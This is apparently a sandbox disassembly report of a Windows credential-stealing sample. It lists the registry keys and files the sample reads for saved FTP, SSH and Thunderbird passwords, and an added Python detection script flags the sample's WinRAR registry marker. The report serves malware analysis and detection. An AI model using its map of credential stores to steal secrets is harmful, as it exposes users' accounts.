                  • Instruction ID: 37bae476364215f7a376405172e95ff0b3e620823ab204ba3b78da35b93a11c1
                  • Opcode Fuzzy Hash: b7997a29f9ee12ea2c8683bdef5b38ffdcc73321be99e554f2081b4ec90afc21
                  • Instruction Fuzzy Hash: 5C216D3191020DBADF21ABE1CD46FDD7A79AB14748F104476B604B50E1E6F99B909B1C
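The record above shows the function at 004024B2 creating the key Software\WinRAR (the hive argument is not resolved in the dump), writing a value with dwType 3 (REG_BINARY), resolving the temp path and creating a directory under it, then closing and deleting a file. A host-side detection for the registry part of that sequence, added here as an example and not produced by Joe Sandbox or its plugin: it runs over Sysmon-style registry events (Event ID 13, value set) and flags writes under Software\WinRAR by any process that is not WinRAR itself, rating a binary value higher because that is the type the sample writes. The flattened event format, the user SID, the allow-listed image names and the value name Marker (the report shows the name only as ?) are assumptions of this example, and the events are constructed.

```python
"""Detection over Sysmon-style registry events for the write shown in the
record for 004024B2: RegCreateKeyA on Software\\WinRAR, then RegSetValueExA
with dwType 3 (REG_BINARY). Added example; events below are constructed."""
from __future__ import annotations
import re
from dataclasses import dataclass
from typing import Iterable

# Sysmon Event ID 12 = key created/deleted, 13 = value set. Real Sysmon output is
# EVTX/XML; this example assumes it was flattened to "Field=value|Field=value".
FIELD_RE = re.compile(r"(\w+)=([^|]*)")
MARKER_KEY = "\\software\\winrar\\"
# Processes expected to write under Software\WinRAR (assumed allow-list).
ALLOWED_IMAGES = {"winrar.exe", "rar.exe", "unrar.exe"}


@dataclass
class RegEvent:
    event_id: int
    image: str
    target: str
    details: str


def parse_event(line: str) -> RegEvent:
    f = dict(FIELD_RE.findall(line))
    return RegEvent(int(f["EventID"]), f["Image"], f["TargetObject"], f.get("Details", ""))


def marker_write_severity(ev: RegEvent) -> str | None:
    """None when the event is not a suspicious write under Software\\WinRAR.
    'high' when the value is binary (the dwType 3 the sample uses),
    'medium' for any other value type written there by a non-WinRAR process."""
    if ev.event_id != 13 or MARKER_KEY not in ev.target.lower():
        return None
    image = ev.image.rsplit("\\", 1)[-1].lower()
    if image in ALLOWED_IMAGES:
        return None
    # Sysmon renders REG_BINARY values as the literal text "Binary Data".
    return "high" if ev.details.strip().lower() == "binary data" else "medium"


def find_marker_writes(lines: Iterable[str]) -> list[tuple[str, RegEvent]]:
    hits = []
    for line in lines:
        ev = parse_event(line)
        sev = marker_write_severity(ev)
        if sev:
            hits.append((sev, ev))
    return hits


SID = "S-1-5-21-1111111111-222222222-3333333333-1001"  # constructed user SID
SAMPLE_EVENTS = [
    # key creation by the sample (event 12): context only, not a value write
    f"EventID=12|Image=C:\\Users\\user\\Desktop\\2qsdqACnX3.exe|TargetObject=HKU\\{SID}\\Software\\WinRAR|EventType=CreateKey",
    # the REG_BINARY write; the value name is '?' in the report, 'Marker' is a placeholder
    f"EventID=13|Image=C:\\Users\\user\\Desktop\\2qsdqACnX3.exe|TargetObject=HKU\\{SID}\\Software\\WinRAR\\Marker|Details=Binary Data",
    # WinRAR updating its own settings: allow-listed
    f"EventID=13|Image=C:\\Program Files\\WinRAR\\WinRAR.exe|TargetObject=HKU\\{SID}\\Software\\WinRAR\\Interface\\LastFolder|Details=C:\\Users\\user\\Downloads",
    # unrelated value write
    f"EventID=13|Image=C:\\Windows\\explorer.exe|TargetObject=HKU\\{SID}\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden|Details=DWORD (0x00000001)",
    # a non-WinRAR process writing a string value there: still worth a look
    f"EventID=13|Image=C:\\Users\\user\\AppData\\Local\\Temp\\x.exe|TargetObject=HKU\\{SID}\\Software\\WinRAR\\Marker|Details=abc",
]

if __name__ == "__main__":
    for sev, ev in find_marker_writes(SAMPLE_EVENTS):
        print(sev, ev.image, ev.target)
```

The allow-list is deliberately short: a WinRAR installer or updater writing under the key would also be flagged, which is the right default for a key that this sample uses as its own marker and that practically nothing else should touch.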

                  Control-flow Graph

                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00404C8C
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(?), ref: 00401BEE
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                    • Part of subcall function 00401BCD: lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                    • Part of subcall function 00401BCD: lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                  • GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,00411805,?,00000104,?), ref: 00404CDC
                  • GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,00411805,?,00000104,?), ref: 00404D17
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
                  • String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
                  • API String ID: 2508676433-45949541
                  • Opcode ID: b48a19c3fedec4f26597234550fce3125c583f965fd7da7918b0654d8a73ed6f
                  • Instruction ID: 833972c600fc57ce649323aa9ebf1fa4e87c99d79a78d52b417d9e2bfeec2045
                  • Opcode Fuzzy Hash: b48a19c3fedec4f26597234550fce3125c583f965fd7da7918b0654d8a73ed6f
                  • Instruction Fuzzy Hash: E92125B0A8020CBADF21BAA1CD43FD93D699B48744F100577B748B51E2D6F88ED09A6D
                  APIs
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E5FE
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040E632
                  • GetPrivateProfileStringA.KERNEL32(Program,DataPath,00411805,?,00000104,00000000), ref: 0040E6B8
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040E711
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocCloseEnumLocalOpenPrivateProfileString
                  • String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
                  • API String ID: 1343824468-2495907966
                  • Opcode ID: f7f0f3633f25f2bd9f0937b0f3f18dbeb2d7bad1331dcb419371d179e8ceaddf
                  • Instruction ID: 36dd7cfe40a76730b9bba45eaf33402ea87356010da727bd2c80388284970864
                  • Opcode Fuzzy Hash: f7f0f3633f25f2bd9f0937b0f3f18dbeb2d7bad1331dcb419371d179e8ceaddf
                  • Instruction Fuzzy Hash: DD31FA3190410CFADF116FA18C42FDD7AB9BF04704F1088BAB655750E1EBBA5A919B98
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00406030
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406064
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406272
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Host$Port$PthR$SSH$User
                  • API String ID: 1332880857-1643752846
                  • Opcode ID: 22d3199f6ffb7bd7c324d631388ededfce537ac4dd85ea99bb1351676a49edd8
                  • Instruction ID: 717bec1f817c6041e82a5bb1f673203c31f40167fb263f3afb6c8f705fbd8957
                  • Opcode Fuzzy Hash: 22d3199f6ffb7bd7c324d631388ededfce537ac4dd85ea99bb1351676a49edd8
                  • Instruction Fuzzy Hash: 8751C531940118EADF227B51CD42BD9BBB5BF04308F10C0BAB645750B1DBBA5AA1EF88
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00405B7F
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405BB3
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405D5F
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumFreeLocalOpen
                  • String ID: HostAdrs$Password$Port$RemoteDir$UserName
                  • API String ID: 3369285772-3748300950
                  • Opcode ID: 861065ac100eef7e94bd919a254844cf1528a48578ae58a6f8f0bce791b71619
                  • Instruction ID: bd6511a607c152044000779701187701da5593353ec7af31bd24a4650797122f
                  • Opcode Fuzzy Hash: 861065ac100eef7e94bd919a254844cf1528a48578ae58a6f8f0bce791b71619
                  • Instruction Fuzzy Hash: 5041A431940118BADF227B51CD42BD9BBB9FF04308F10C0BAB245750B1DBBA5A91AF98
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00406D71
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00406DA5
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00406F37
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Directory$Password$Server$UserName$_Password
                  • API String ID: 1332880857-3317168126
                  • Opcode ID: 0295d48f9159583e3bb3b4c81249b031f90fd7620fc95874c7d8aa04f99b4e09
                  • Instruction ID: 16d1b833b2ee5968848fc559eb8c09407504fd4541dfa60c1da0701f2eff17c4
                  • Opcode Fuzzy Hash: 0295d48f9159583e3bb3b4c81249b031f90fd7620fc95874c7d8aa04f99b4e09
                  • Instruction Fuzzy Hash: 6341953194011CBADF226F51CD42BDDBBB5BF04304F10C1BAB559750B2DBBA5AA1AF88
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D5EF
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D623
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D7B7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: HostName$Password$PortNumber$TerminalType$UserName
                  • API String ID: 1332880857-1017491782
                  • Opcode ID: 36fac6972d13d9aaf5a0a37310bf3e32aab8aaddad991833400995bc47fd96b9
                  • Instruction ID: 80c3a7e6e8e16172fa092274a63f5f0f4b87c6c355c6ed336365e5d713e553db
                  • Opcode Fuzzy Hash: 36fac6972d13d9aaf5a0a37310bf3e32aab8aaddad991833400995bc47fd96b9
                  • Instruction Fuzzy Hash: 40419531840118FADF226F91CC42BDDBBB5BF04308F10C4BAB649751B1DB7A5AA59F88
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00406F9C
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00406FD0
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407162
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
                  • API String ID: 1332880857-980612798
                  • Opcode ID: 675a1423b11df55a91f59a4ac948b29fe10135cf848136257ad25863e74e94f9
                  • Instruction ID: fac69ff356c5d9a3a700d045b1112cda43426525da53c38b63ceafff8f4ab98b
                  • Opcode Fuzzy Hash: 675a1423b11df55a91f59a4ac948b29fe10135cf848136257ad25863e74e94f9
                  • Instruction Fuzzy Hash: B541B63194011CBADF226F51CD42BDDBBB5BF04304F10C0BAB659791B1DBBA5AA19F88
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00405E17
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405E4B
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405FE0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: HostDirName$HostName$Password$Port$Username
                  • API String ID: 1332880857-791697221
                  • Opcode ID: 5f429ff3d63b552880f898da56513a68410768927777eac0ef42e1b95d242391
                  • Instruction ID: 02d2e0d06eb6aa5cd977bda184cad4249618897674006919e1422700d120f387
                  • Opcode Fuzzy Hash: 5f429ff3d63b552880f898da56513a68410768927777eac0ef42e1b95d242391
                  • Instruction Fuzzy Hash: A8418531940118BADF227B51DD42BDDBBB5FF04304F10C0BAB645750B1DBBA5AA1AF98
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 0040D1B8
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D1EC
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D36F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Host$Pass$Port$Remote Dir$User
                  • API String ID: 1332880857-1775099961
                  • Opcode ID: 72010a422a528b3a6febdf38cc13342291fb876f8aca6c746118a020dd241374
                  • Instruction ID: 16c70e4eb59eb3fe7fd28d31a3833132b033dbea7dcbbf5d53e6c61d8458b25c
                  • Opcode Fuzzy Hash: 72010a422a528b3a6febdf38cc13342291fb876f8aca6c746118a020dd241374
                  • Instruction Fuzzy Hash: DC41D771840118BADF227F91CD42BDCBBB5BF04704F10C0BAB645750B2DB7A5A91AF98
                  APIs
                  • StrStrIA.SHLWAPI(007200D8,BlazeFtp), ref: 0040C42C
                    • Part of subcall function 00402200: lstrlen.KERNEL32(?), ref: 00402214
                    • Part of subcall function 00402200: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 00402233
                    • Part of subcall function 00402200: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402245
                    • Part of subcall function 00402200: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402257
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
                  • API String ID: 1884169789-2976447346
                  • Opcode ID: 45f9370da21ecbccc8b1bb17dd46baba8a71987c16784ecbe0b6d5142734595e
                  • Instruction ID: 087c8f14cc38ebf4340fa4c74bc8456b090ac4174222f55b5626d9778e4d167b
                  • Opcode Fuzzy Hash: 45f9370da21ecbccc8b1bb17dd46baba8a71987c16784ecbe0b6d5142734595e
                  • Instruction Fuzzy Hash: 4531F730940109BADF126FA1DC42BAE7F72AB40B45F10813AB615351F2D7B95B90EB8C
                  APIs
                  • StrStrIA.SHLWAPI(007200D8,CUTEFTP), ref: 00405007
                    • Part of subcall function 00402200: lstrlen.KERNEL32(?), ref: 00402214
                    • Part of subcall function 00402200: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 00402233
                    • Part of subcall function 00402200: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402245
                    • Part of subcall function 00402200: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402257
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  • CUTEFTP, xrefs: 00405001
                  • Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405071
                  • Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 004050A5
                  • Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 00405098
                  • Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 0040508B
                  • Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 00405064
                  • \sm.dat, xrefs: 0040501B
                  • Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 0040507E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$\sm.dat
                  • API String ID: 1884169789-2738976122
                  • Opcode ID: 53a5ffd72eef3946d52d7a2c873d6d4d47f5f81c126ab374a59c1b1bfb5f9826
                  • Instruction ID: 40326283f0e2aaf7953628d4f5848c5de1a0b9c4e64ebf3f828c0269d9f17f80
                  • Opcode Fuzzy Hash: 53a5ffd72eef3946d52d7a2c873d6d4d47f5f81c126ab374a59c1b1bfb5f9826
                  • Instruction Fuzzy Hash: AB1121B0640109B9DF21BF21CD02FDE3E65AF51784F104136BA44B51F3C7BD8AA1969C
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00406947
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040697B
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406B1C
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumFreeLocalOpen
                  • String ID: Hostname$Password$Port$Username
                  • API String ID: 3369285772-1811172798
                  • Opcode ID: 7748ef1c9e17dcbd72711a2d7625c610005a5d9d9387b89186d8fef29979e095
                  • Instruction ID: 24717ae2ce83b4fee808f0103274e04dd0bff139fda315af897242a983001c14
                  • Opcode Fuzzy Hash: 7748ef1c9e17dcbd72711a2d7625c610005a5d9d9387b89186d8fef29979e095
                  • Instruction Fuzzy Hash: B341C87194011CEADF21BB51CC42BD9BAB9BF04308F10C0BAB545750B1DFBA5AA19F98
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 0040674E
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406782
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004068F7
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumFreeLocalOpen
                  • String ID: FtpPort$Password$Server$Username
                  • API String ID: 3369285772-1828875246
                  • Opcode ID: 33ababc615020c475aea93dc55798473f16b2b39c4eed30d71edd941c412992a
                  • Instruction ID: 2d861f8c944312f088572d5a7307ac687774c4b6fa6ec605e7997a0d99139e7a
                  • Opcode Fuzzy Hash: 33ababc615020c475aea93dc55798473f16b2b39c4eed30d71edd941c412992a
                  • Instruction Fuzzy Hash: 3041D931940118FADF217B51CD42BD97BB9BF04308F10C0BAB545750B1DBBA5AA5AF98
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DE29
                  • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,?), ref: 0040DF59
                    • Part of subcall function 00403FF9: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404045
                    • Part of subcall function 00403FF9: LocalFree.KERNEL32(00000000), ref: 00404079
                    • Part of subcall function 00401548: lstrlen.KERNEL32(00000000), ref: 00401554
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCryptDataFreeLocalOpenUnprotectlstrlen
                  • String ID: Folder$Port$Site$UserID$xflags
                  • API String ID: 2167297517-269738940
                  • Opcode ID: b197340e990e52b368227ab337fb88699f86a103d108e5365677279b24fd79d5
                  • Instruction ID: a6a90b714e26ee6588c0913544ebb450cdb080e323798d6688fbffd92cab19fa
                  • Opcode Fuzzy Hash: b197340e990e52b368227ab337fb88699f86a103d108e5365677279b24fd79d5
                  • Instruction Fuzzy Hash: C5319335C5010ABBDF12AF91CC42AEEBB72BF04349F10843AB611751F1D77A9A64EB48
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004074BD
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004074F1
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040760C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: DataDir$InstallPath$sites.dat$sites.ini
                  • API String ID: 1332880857-3870687875
                  • Opcode ID: 7898ede5be31474b678268efb6e6f80c155cac00ced80efcf6e420b7494e70d9
                  • Instruction ID: d3284ad3f34496e62fd12d7fa9e0dcff96666478f7bf7f6fef37d7e2cb8aa850
                  • Opcode Fuzzy Hash: 7898ede5be31474b678268efb6e6f80c155cac00ced80efcf6e420b7494e70d9
                  • Instruction Fuzzy Hash: 5331F83190011CBADF21AF51CD02FDD7ABABF04304F10C4B6B545750A1DBBA6BA19F99
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F42F
                    • Part of subcall function 0040981E: StrStrIA.SHLWAPI(?,?), ref: 0040982A
                    • Part of subcall function 0040981E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 004098A1
                    • Part of subcall function 0040981E: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 004098CD
                    • Part of subcall function 0040981E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409915
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F474
                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F48F
                  • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F4D4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                  • API String ID: 3062143572-138716004
                  • Opcode ID: fb50987f158ec55cfe2bb98806428d2a930dfc83a1c3585cb17d9350d07b801a
